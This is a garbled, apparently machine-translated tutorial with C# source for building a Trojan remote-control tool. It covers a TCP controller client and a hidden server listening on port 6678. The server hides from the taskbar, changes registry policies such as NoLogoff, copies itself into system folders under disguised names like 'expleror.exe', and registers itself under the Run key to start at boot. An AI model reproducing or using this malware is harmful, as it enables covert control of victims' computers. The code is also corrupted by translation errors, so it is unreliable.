Trojan introduction Because this article is to explore Trojans, there are basic knowledge of some Trojan composed prior art before introducing. A complete Troist system consists of a hardware portion, a software portion, and a specific connection part. Here mainly introduces the software part, it mainly has a controller program, Trojan (background service), and Trojan formulation. The control end is used to remotely control the server's program; the Trojan is the program that sneaked into the server. The Trojan formulation is the port number, trigger condition, Trojan name, etc., which set the Trojan. More hidden programs.
Use technology:
The control terminal program sends a control code control server, the server background operation, and the purpose of modify the registration expression. Technology is not very difficult, mainly reflects the modification of the network programming and registry of C #.
Control terminal development:
The control terminal issues a control code to the server, after receiving the control code, complete the designated requirements based on the control requirements, if the server completes the job, return successful information.
Development of the control end:
The setting of the control code You can set itself, do not need to be detailed, there are several difficulties.
1, connection request
Use the system.net.sockets.tcpclient class in the .NET class, TcpClient (String Hostname, int port) hostname is the host name to be controlled, of course you can also use the IP address. Port is a port. // System.Eventargs contains the base class private void button7_click (Object sender, system.eventargs e) {// record operation in the RichTextBox control, add operation information in the RichTextBox control, adds the operation information ("Request Connection TextBox1.Text "/ r"); int port = 6678; try {// Initialize the new instance of the TCPClient class and connects to the specified port client = new tcpclient on the specified host (TEXTBOX1.TEXT, PORT);} catch {messagebox.show (" The server is not online! Determines if the host name is entered. "); RichtextBox1.AppendText (" The server is not online! Determine if you enter the host name. ");}} // private void buttion
2, whether the test is connected to the controlled machine. The process of the program is to send the control code to see if the control terminal has a reaction. If there is a return, the control is successful. / / Provide data streams from network access
// private NetworkStream stream; code is as follows: private void button8_Click (object sender, System.EventArgs e) {// record operation richTextBox1.AppendText ( "Test Connection" "/ r"); try {stream = client.GetStream () ; if (stream.canwrite) {// Send control code string control = "jiance"; Byte [] by = system.text.Encoding.ascii.getbytes; stream.write (by, 0, By.Length); // Next time use stream.flush (); // Start receiving Reverse data The thread // receive is the function of the thread execution, see the back analysis throughReadRecEive = New Thread (New ThreadStart (receive); ThreadReceive.Start ();}} catch (ee.Message "/ r"); messagebox.show (ee.Message);}}} 3
private void button9_Click (object sender, System.EventArgs e) {// This is the control code to be transmitted is determined, RadioButton a form control if (radioButton1.Checked) {control = form2.zhucex;} else if (radioButton2.Checked) {control = form3.zhuces;} else if (radioButton3.Checked) {control = warring;} else if (radioButton4.Checked) {control = suggest;} else if (radioButton5.Checked) {control = form4.mumawe;} else IF (Radiobutton6.checked) {control = drop;} if (Control == "000000") {MessageBox.show ("You don't enter any control target! Do not control signal"); richtextbox1.appendtext ("You did not enter any Control target! No control signal ");} else if (control! =" 000000 ") {try {// Record operation RichtextBox1.AppendText (Control " is trying to control, wait a response ... " " / r "); stream = client.getStream (); if (stream.canwrite) {byte [] by = system.text.Encoding.Scii.getbytes; stream.write (by, 0, By.Length); stream.flush (); threadReceive = New Thread (New ThreadStart (receive)); threadRecherive.Start ();} // endif} // Trycatch {richtextBox1.AppendText ("The server is not connected 1 control is invalid! " " / r "); messagebox.show (" Server unconnected 1 control is not valid! " " / r ");}} // else if}
4, the function of thread execution private void receive () {// Sets the space for reading data byte [] bb = new byte [3]; // Read 3 bytes, i is the number of bytes that actually read i = stream.read (BB, 0, 3); // Convert to string, if it is a Chinese control code, use string ss = //system.text.Encoding.unicode.getstring (BB );String ss = system. Text.Encoding.ascii.getstring (bb); // hjc The return code HJC of the server I set is successful, HKZ is the success IF (SS == "hjc") {MessageBox.show ("successful success") RichtextBox1.AppendText ("Connection Success");} if (ss == "HKZ") {RichTextBox1.AppendText (Control "Control Success" "/ R"); MessageBox.show (Control "Control Success" "/ r");}}
Service development:
To achieve the procedure of Trojan service, it is mainly to achieve the following functions: the operation of the background (hidden technology), the reception of the control code and the modification of the registry, the following introduction to these three aspects:
1. In the VC #, establish a background service program is easy, first create a new C # Windows application, the project name is self-defined (but to hide the name and the name of the system), the form properties " The showintaskbar "property is set to false, let it run in the taskbar when running, and set the property" WindowsTate "property to MININIZED, so that the form can be hidden. Of course, you can also set up in InitializationComponent (), this function is initialized, running before the form is displayed, the code is as follows:
Private void initializeComponent () {// // Form1 // // Form display starting and size this.AutoscaleBaseSize = new system.drawing.size (6, 14); this.clientsize = new system.drawing.size (368 , 357); // Form Name This.Name = "FORM1"; // Setting the property to run this.showintaskbar = false in the background; this.text = "form1"; this.WindowState = system.Windows.Forms.FormWindowState .Minimized;
2
Public Form1 () // Form constructor {/// Windows Form Designer Support for // InitializeComponent (); /// Todo: Add any constructor code // after INITIALIZECOMPONENT calls // Add you Listening code // port You can set itself, I use fixed port INT port = 6678; // system.net.sockTs.tcplistener is listener = new TCPListener used to listen to the client in the TCP network (Port ); // Start listening listener.Start (); // increase the thread of the received control code, if you want to stop the thread can use thread.abort () // recontrolcode to start execution of the thread startup, this function is based on the received control / / Control code Select the appropriate registry modification function thread thread = new thread (New ThreadStart ()); thread.start ();} The recontrolcode function is as follows, the full code see the program private void recontrolcode () {// Settings receiving socket Word, receive listener.acceptsocket is a request for the client that has been received Socket (); // If the connection successfully executes while (socket.connected) {// receive control code Byte [] by = new byte [6] ; int i = socket.receive (by, by.length, 0); string ss = system.text.Encoding.ascii.getstring (by); // Different function // modify the registry encoded Switch based on the control code (ss) {case "jiance": // Test connection, return test information string string str = "hjc"; byte [] bytee = system.text.Encoding.ascii.getbytes (str); socket.send (bytee, 0, Bytee.Length, 0); Break; Case "ZX1000": // Modify the registry function, self-defined, see the following analysis unlogoff (); // Return control message RetMessage (); break; case "zx0100": / / Modify the registry function UNCLOSE (); // Return to the control message RetMessage (); Break; // Repeat the Case function, slightly detuult: Break;} // case} // while} // private void recontrolcode3 In the C # implementation of the registry modification, use the system.microsoft.win32 command space in the .NET class library, which provides two types of classes: Processing the class that caused by the operating system and operates on the system registry. class. Below you can see its usage. Here I have made a subroutine that modifies the registry: make the computer can't log out. Before this, you can understand the registry, in sub-key Software // Microsoft // windows // currentversion // policies // Explorer, the key value nologoff is 1 to make the computer can not log out. In the following functions, use C # to implement the modification of the registry:
Private void unlogoff () {// Get the top-level node of the host's registry microsoft.win32.registryKey rlocal = registry.localmachine; // Set a registry key key1; try {// function registryKey.OpenSubkey (String RegistryKey, Bool CanWrite Retrieve the specified sub-key // registryKey is the key value specified by the user, canwrite can modify it, default is FASLE inexposed key1 = rlocal.opensubkey ("Software // Microsoft // Windows // CurrentVersion / / Policies // Explorer ", true); // Set the key name of the subkey, and the value Key1.SetValue (" NOLOGOFF ", 1); // Close the open sub-key Key1.close (); // Warning string Set mystr = mystr "HKEY_LOCAL_MACHINE / / SOFTWARE // Microsoft // WINDWARE // CurrentVersion // Policies // Explorer key value NOLOGOFF is modified! Please set it to 0!";} Catch {} // If there is no Self-established if (key1 == null) {try {// uses the registrykey.createSubkey (String MyString) function to establish the sub-key key key2 = rlocal.createSubkey ("Software // Microsoft // Windows // CurrentVersion /// Policies // Explorer "); Key2.SetValue (" NOLOGOFF ", 1); key2.close (); mystr = mystr hkey_local_machine // Software // microsoft // windows // costversion // policies // Explorer key value NOLOGOFF is modified! Please set it to 0! ";} Catch {}}} 4, there is an important function in the Trojan program is self-copying and transfer. Trojans must automatically hide Trojans in SYSTEM, SYSTEM32, to prevent discovery. The transfer code analysis is as follows, the functionality of the main implementation is to transfer the Trojans under the D to C: //winnnt//system/Msdoss.exe, and the name is changed. Used .NET namespace system.io, its role is to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System.IO.File class.
Private Void Movecc1 () {Try {// Fun.move (String SourceFileName, String Destfilename) The action of the mobile file // sourceFileName is the file name to move, DestFileName is the new path for the file file.move ("C: / /Winnnt//system/Msdoss.exe", "d://winnt//system32///winnt//system32//expleror.exe" "] Catch {} // Set the new moving Trojan to self-start. Analysis and front Try {key1 = rlocal.opensubKey ("Software // Microsoft // Run", true); Key1.SetValue ("MicrosoftT", "D: //winnt/system32//expleror.exe" ); key1.close ();} catch {} if (key1 == null) {Try {registryKey key2 = rlocal.createSubkey ("Software // Microsoft // Windows // CurrentVersion // Run"); Key1.SetValue "MicrosoftT", "D: //winnt//system32//expleror.exe"); key1.close ();} catch {}}} // Movec1 () to the Trojan of a simple C # hip hip to finish.